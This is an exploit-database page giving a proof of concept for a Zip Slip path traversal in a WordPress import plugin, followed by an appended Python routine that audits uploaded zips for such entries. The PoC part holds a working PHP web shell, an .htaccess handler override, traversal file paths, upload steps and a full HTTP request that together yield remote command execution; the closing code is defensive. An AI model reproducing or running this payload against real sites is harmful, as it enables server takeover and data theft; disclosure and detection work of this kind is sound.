## https://sploitus.com/exploit?id=WPEX-ID:11E73C23-FF5F-42E5-A4B0-0971652DCEA1
[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains the following 2 files:
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu--
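
A defender-side check for the archive layout listed in step [1], added here as an example (it is not part of the original PoC or the plugin's code): it audits an uploaded zip before extraction and reports entries that resolve outside the extraction directory, server configuration files, and names carrying a php extension. The directory `/srv/uploads/import`, the function names and the sample archive are assumptions constructed for illustration.

```python
import io
import posixpath
import zipfile

DEST = "/srv/uploads/import"               # hypothetical extraction directory
CONFIG_NAMES = {".htaccess", ".user.ini"}  # files that change how the server handles a directory


def audit_zip(data: bytes, dest: str = DEST) -> dict:
    """Map each unsafe entry name to the reasons it must not be extracted."""
    dest = posixpath.normpath(dest)
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            # Resolve the name against dest the way a naive extractor would.
            target = posixpath.normpath(posixpath.join(dest, name))
            base = posixpath.basename(target).lower()
            reasons = []
            if name.startswith("/") or not target.startswith(dest + "/"):
                reasons.append("escapes extraction directory")
            if base in CONFIG_NAMES:
                reasons.append("server configuration file")
            # Any "php" component counts, because a handler override can make
            # names such as x.php.txt executable.
            if "php" in base.split(".")[1:]:
                reasons.append("php extension in name")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample() -> bytes:
    """Constructed test archive: entry names follow step [1], contents are inert."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("data/products.csv", "sku,price\n1,9.99\n")
        zf.writestr("../../../../../../../../var/www/html/.htaccess", "placeholder")
        zf.writestr("../../../../../../../../../../var/www/html/exploit.php.txt", "placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in audit_zip(build_sample()).items():
        print(entry, "->", "; ".join(why))
```

An upload handler would reject the whole archive when `audit_zip` returns anything, rather than skipping only the flagged entries.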